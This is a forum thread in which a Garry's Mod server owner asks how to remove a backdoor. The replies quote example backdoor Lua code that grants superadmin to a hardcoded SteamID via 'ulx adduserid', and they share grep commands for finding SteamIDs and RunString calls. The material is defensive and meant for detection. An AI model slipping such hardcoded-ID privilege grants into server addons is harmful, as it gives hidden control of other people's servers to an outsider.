Garry's Mod

How to remove BACKDOOR ?

Submitted by Zebeub2000, , Thread ID: 241506

Zebeub2000
Lurker
Level:
0
Reputation:
0
Posts:
8
Likes:
0
Credits:
10
29-04-2022, 08:25 PM
#1
I have a server and i have a backdoor so how to remove :(

RE: How to remove BACKDOOR ?

space_
Lurker
Level:
0
Reputation:
0
Posts:
6
Likes:
0
Credits:
15
06-05-2022, 04:29 AM
#2
Do You What File It Is Located In ?

Source Of Quote: https://mtxserv.com/gmod-server/doc/how-...or-on-gmod

To identify a backdoor, you have to look at all SteamIDs. For example:

AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)

That is not a backdoor. It's just the name of a legit player.


A backdoor looks like this:

2 - AUTHENT (Presence of Steam ID) addons/nestorro/lua/autorun/nestorro_launch.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then

If you have

ply:SteamID() == "STEAM_0:100000000") then

It's possibly a backdoor. You always have to check something like that! A backdoor can be something like:

if ( ply:SteamID() == "STEAM_0:1:00000000") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else

How to remove a backdoor?

To remove the entire backdoor, remove the code (which can look like this):

concommand.Add( "Nestor", function(ply) if ( ply:SteamID() == "STEAM_0:0:82261024") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else ply:ChatPrint("Bye " .. ply:Name() .. ".") end end)

RE: How to remove BACKDOOR ?

GenaKiller1
Lurker
Level:
0
Reputation:
0
Posts:
9
Likes:
0
Credits:
3
07-05-2022, 08:20 AM
#3
To remove the entire backdoor, remove the code (which can look like this): Here comes the bus.

RE: How to remove BACKDOOR ?

Globungus
Newbie
Level:
1
Reputation:
0
Posts:
19
Likes:
0
Credits:
28
22-05-2022, 09:46 AM
This post was last modified: 22-05-2022, 10:29 AM by Globungus
#4
Good things to look for are SteamIDs as mentioned, my preferred method is to search for any 17 digit numbers (SteamID 64) and STEAM_
Can be accomplished with
Code:
find ./ -exec grep -E '\d{17}|STEAM_' {} \; -print 2>/dev/null

For bytecode and other obfuscated code try to search for RunString with
Code:
find ./ -exec grep 'RunString' {} \; -print 2>/dev/null

Users browsing this thread: 1 Guest(s)